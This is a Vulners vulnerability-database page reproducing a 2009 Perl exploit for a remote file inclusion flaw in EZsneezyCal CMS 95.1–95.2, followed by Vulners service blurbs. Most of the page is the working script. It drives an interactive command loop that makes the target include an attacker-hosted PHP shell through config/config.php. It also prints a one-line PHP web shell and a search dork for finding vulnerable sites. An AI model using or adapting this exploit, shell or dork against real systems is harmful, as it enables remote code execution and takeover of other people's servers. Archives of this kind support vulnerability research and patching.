Vulners
Lucene search
EZsneezyCal CMS 95.1-95.2 File Inclusion Vulnerability
======================================================
EZsneezyCal CMS 95.1-95.2 File Inclusion Vulnerability
======================================================
#!/usr/bin/perl
#####
# [+] Author : kaMtiEz
# [+] Date : September 30, 2009
# [+] Homepage : http://www.indonesiancoder.com
# [+] Vendor : http://www.jdtmmsm.com/
# [+] Download : http://www.jdtmmsm.com/downloads/index.php?expA=1
# [+] version : v95.1 - 95.2
# [+] Method : Remote File Inclusion
# [+] Dork : "Kill-9"+"IndonesianCoder"
# [+] Location : INDONESIA
# [~] Notes :
# makasih buad babe and enyak ma ade .... muach ..
# sayang jangan marah dong .. maaf kemarin bangun jam 8 malem .. :(
# buat vycOd kuliah coy ojo fbnan wae ! wkwkwkwk
# pagi jam 10 ditemani don tukulesto .. dan setelah mencoba akhirnya dapet vuln .. zzzzzzzzzzzzzzzzz
# Aura Kasih : Apakah harus kaMtiEz, atau Don Tukulesto yang aku pilih ?
# [~] Usage :
# perl kaMz.pl <target> <weapon url> <cmd>
# perl kaMz.pl http://127.0.0.1/path/ http://www.site.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
use HTTP::Request;
use LWP::UserAgent;
$Tux = $ARGV[0];
$Pathloader = $ARGV[1];
$oliv = $ARGV[2];
if($Tux!~/http:\/\// || $Pathloader!~/http:\/\// || !$oliv){usage()}
head();
sub head()
{
print "[X]============================================================================[X]\r\n";
print " | EZsneezyCal CMS Remote File Inclusion |\r\n";
print "[X]============================================================================[X]\r\n";
}
while()
{
print "[w00t] \$";
while(<STDIN>)
{
$kamz=$_;
chomp($kamz);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Tux.'config/config.php?cfg[rootPath]='.$Pathloader.'?&'.$oliv.'='.$kamz)or die "\nCould Not connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[I]/;
if (!$kamz) {print "\nPlease Enter a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request denied!/ || $return =~/: Cannot execute a blank command in /)
{print "\nCann't Connect to cmd Host or Invalid Command\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[I]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}
else {print "[w00t] \$";}}}last;
sub usage()
{
head();
print " | Usage: perl kaMz.pl <target> <weapon url> <cmd> |\r\n";
print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n";
print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n";
print " | <cmd> - Command variable used in php shell |\r\n";
print "[X]============================================================================[X]\r\n";
exit();
}
# 0day.today [2018-02-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Oct 2009 00:00Current
7.1High risk
Vulners AI Score7.1